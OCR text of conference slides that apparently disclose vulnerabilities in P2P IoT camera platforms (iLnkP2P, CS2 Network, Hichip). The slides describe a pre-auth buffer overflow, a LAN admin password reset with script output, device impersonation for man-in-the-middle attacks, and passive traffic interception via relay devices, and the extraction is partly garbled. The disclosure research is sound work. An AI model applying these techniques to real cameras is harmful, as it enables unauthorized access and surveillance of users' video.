5e:b0: - 2462 -47 [WPA-PSK-CCMP+TKIP ] [WPA2-PSK-CCMP+TKIP][ESS] 
5c:bø: 2462 -47 [WPA-PSK-CCMP+TKIP ] [WPA2-PSK-CCMP+TKIP][ESS] 
2462 -49 [WPA-PSK-CCMP+TKIP ] [WPA2-PSK-CCMP+TKIP] [ESS] 
W si 2412 -49 [WPA-EAP-CCMP][WPA2-EAP-CCMP][ESS] 
2437 -51 [WPA-EAP-CCMP+TKIP ] [WPA2-EAP-CCMP+TKIP][ESS] 
2437 -51 [WPA2-PSK-CCMP] [ESS] 
J 2457 -61 [WPA2-PSK-CCMP] [ESS] 
B 2437 -63 [WPA2-PSK-CCMP] [ESS] 
2462 -65 [WPA-PSK-CCMP+TKIP ] [WPA2-PSK-CCMP+TKIP][ESS] 
2452 -67 [WPA2-PSK-CCMP] [ESS] 
E 2412  -67 [WPA2-PSK-CCMP] [ESS] 
_ = a 2412 -69 [WPA2-PSK-CCMP] [ESS] 
2412  -69 [WPA2-PSK-CCMP][ESS] 
2432 -83 [WPA-PSK-CCMP+TKIP ] [WPA2-PSK-CCMP+TKIP][ESS] 
a 2462 -75 [WPA2-PSK-CCMP] [ESS] 


Pre-auth remote code execution (CVE-2020-9527) 


[pau Latempest:~]$ curl -H ‘Content-type: application/json' \ 

>  —-data '{ "considerIp": false, "wifiAccessPoints": | { "macAddress": " D }, { "macAddress": "ME" } 1)" N 
>  'https://www.googleapis.com/geolocation/v1/geolocate?key- - KYLE =: 

{ 


"Location": { 
"lat": 37. lam, 
"Ing": -121. BEES: 


"accuracy": 189 


Pre-auth remote code execution (CVE-2020-9527) 


e Buffer overflow in login routine allows remote execution of arbitrary code 
e |f you have a vulnerable device's UID, you can get a shell! 
e Binaries compiled without ASLR/PIE/stack canaries 
e Offsets vary between versions, but very reliable code execution 


e Affects firmware from August 2018 through June 2020 


Password reset via LAN (CVE-2020-9529) 


e Affects all firmware prior to June 2020 


[pau Letempest: admin reset]$ ./reset.sh 

[*] Hichip IP Camera Admin Password Reset (CVE-2020-9529) 
[*] Copyright (c) 2020, Paul A. Marrapese <paul@redprocyon. com> 
Enter device IP (or press enter for autodiscovery): 

[*] Searching for device... 

[*] Resetting admin password of device at 192.168.1.8... 
[*] Response received! 

MCTP/1.0 200 OK 

CSeq:1 

Client-ID:bogus 
Device-ID:48ff0e5ec780ce09d3ff923e3a7ce6a3 

Content-Type: text/HDP 

Content-Length: 74 


Segment-Num: 1 
Segment-Seq: 1 
Data—Length: 26 


[Successlusrpwd reset! 


Abusing P2P to Conduct 
Man-in-the-Middle Attacks 


Over-the-Internet MITM 


e P2P servers coordinate all connections 

e |f we can influence that, man-in-the-middle may be possible 

® Can be done over-the-Internet, not restricted to local network 
e The P2P layer offers no effective protection of session data 

e Application is entirely responsible for security 


e Most do not employ encryption at all, or do so in an insecure fashion 


Over-the-Internet MITM 


Building an encrypted channel... 


Over-the-Internet MITM 


e Devices regularly log in to P2P servers 

e Server takes note of message origin (IP and UDP port) 

e When a client requests a connection, servers tell client to punch to that address 
e This login messages contains just the UID -- no device-specific secret 
e |f we possess a UID, we can forge this message to confuse the server 


e The user will connect to us and authenticate without hesitation... 


Over-the-Internet MITM 


— info: 
| — info: 
| — info: 

— info: 
| — info: 
| — info: 

— info: 
| — info: 

— info: 

^» — info: 
| info: 
— info: 


— info: 
— info: 
— info: 
— info: 
— info: 
— info: 
— info: 
| — info: 
— info: 
— info: 
— info: 
— info: 


[VSTA-057541- 
[VSTA-057541- 
[VSTA-057541- 
[VSTA-057541- 
[VSTA-057541- 
[VSTA-057541- 
[VSTA-057541- . 
[VSTA-057541- 
[VSTA-057541- 
[VSTA-057541- 
[VSTA-057541- 
[VSTA-057541- 

hGET [check "user.cgi?name- INN ms Logir 


[EEEE-000769- 


[EEEE-000769 
[EEEE-000769 
[EEEE-000769 
[EEEE-000769 
[EEEE-000769 
[EEEE-000769 
[EEEE-000769 
[EEEE-000769 
[EEEE-000769 
[EEEE-000769 
[EEEE-000769 


Starting device impersonation... 

Heartbeat sent to P2P servers 

P2P servers requesting connection with client at 73.93.**.**:10357 
P2P servers requesting connection with client at 192.168.**.:**:10357 
Received MSG PUNCH PKT from client at 73.93.++.++:10357 

Received MSG PUNCH PKT from client at 73.93.+#+#.+#+#:10357 

Received MSG PUNCH PKT from client at 73.93.++.++:10357 

Received MSG PUNCH PKT from client at 73.93.+*.**:10357 

Received MSG PUNCH PKT from client at 73.93.++.++:10357 

P2P servers requesting connection with client at 73.93.**.**:10357 
P2P servers requesting connection with client at 192.168.++.++:10357 


(——— EE 


Starting device impersonation... 

Heartbeat sent to P2P servers 

P2P servers requesting connection with client at 73.93.**.**:10041 
P2P servers requesting connection with client at 192.168.**.3**:10041 
Received MSG PUNCH PKT from client at 73.93.+*.**:10041 

Received MSG PUNCH PKT from client at 73.93.+*.**:10041 

Received MSG PUNCH PKT from client at 73.93.**.**:10041 

Received MSG PUNCH PKT from client at 73.93.**.**:10041 

Received MSG PUNCH PKT from client at 73.93.**.**:10041 

P2P servers requesting connection with client at 73.93.**.:**:10041 
P2P servers requesting connection SCH client at 192. 168. ++. ++: 19931 
Data from client (ch: 0, idx: 0) i FTU1dPL 


Over-the-Internet MITM 


e CS2 sometimes "encrypts" the login message... 
e MSG DEV LGN CRC instead of MSG DEV LGN 
e Proprietary symmetric cipher; vendor sets a "CRC key" for their P2P server 
e All their devices need to ship with that key (i.e. accessible in firmware) 
e Some servers allow logging in without the key anyway e 
e Affects iLnkP2P (CVE-2019-11220) and CS2 (CVE-2020-9525) 
e No response from Shenzhen Yunni 


e CS2 states new version 4.0 will fix this 


Passive over-the-Internet MITM 


e Active attack requires a UID, knowledge of protocol, timing, etc... 
e Instead of targeting devices, let the devices come to US. 
e Remember superdevices? 

e Devices that relay sessions for other users 

e Most vendors use these to support their network 

e The P2P layer does not securely encrypt relayed traffic 


e The application traffic is typically not encrypted either... 


Passive over-the-Internet MITM 


This means anyone can buy a device 


and access other people's traffic. 


Passive over-the-Internet MITM 


With gentle PCAP parsing, can actually stream packets straight into ffplay 


Users have no way of knowing whether their connection is being intercepted 
e Bonus! UIDs are leaked during the P2P handshake 


e Exploited this to collect over 236,000 unique CS2 UIDs in 10 months 


Affects iLnkP2P and CS2 (CVE-2020-9526) 


e CS2 states new version 4.0 will fix this 


Worry About Security ? 


Super Device can not spy any data it Relayed (No API for this) 


Demo time! 


Final Thoughts 


Patching 


CVE 
CVE-2019-11219 
CVE-2019-11220 
CVE-2020-9525 
CVE-2020-9526 
CVE-2020-9527 
CVE-2020-9528 
CVE-2020-9529 


Vendor / Product 


Yunni iLnkP2P 
Yunni iLnkP2P 


CS2 Network P2P 
CS2 Network P2P 
Hichip 
Hichip 
Hichip 


Vulnerability Status 
UID enumeration Unpatched 


Device spoofing (MITM) Unpatched 

Device spoofing (MITM) Patch pending (v4.0) 
Data leakage in superdevice Patch pending (v4.0) 
Buffer overflow Patched (June 2020) 
Cryptographic weaknesses  Patched (June 2020) 
Password reset via LAN Patched (June 2020) 


A bleak outlook 


e No hope for some of these issues being fixed retroactively 

e Fundamental flaws with no chance of backwards compatibility 

e Doesn't really matter. Users don't update -- some firmware versions go back to 2015!! 
e Sellers won't pull defective products! 

e Amazon: No comment received 


e eBay: "These devices can be used safely if used in a network without an internet 
connection" & 


1: https://www.which.co.uk/news/2020/06/more-than-100000-wireless-security-cameras-in-the-uk-at-risk-of-being-hacked/ 


Further research 


* More device-specific vulnerabilities exploitable through P2P 
e Other P2P platforms (e.g. Wyze uses ThroughTek Kalay) 
e Other large device manufacturers 


e Higher up the supply chain in general! 


Reversing tips 


e Samples, samples, samples!! Never too many. 
e APKs: Java decompiles into beautiful, readable code (check out JADX!) 
e Throw every single interesting filename or magic string you find into GitHub 


e May reveal SDKs, docs, client source, even firmware source 
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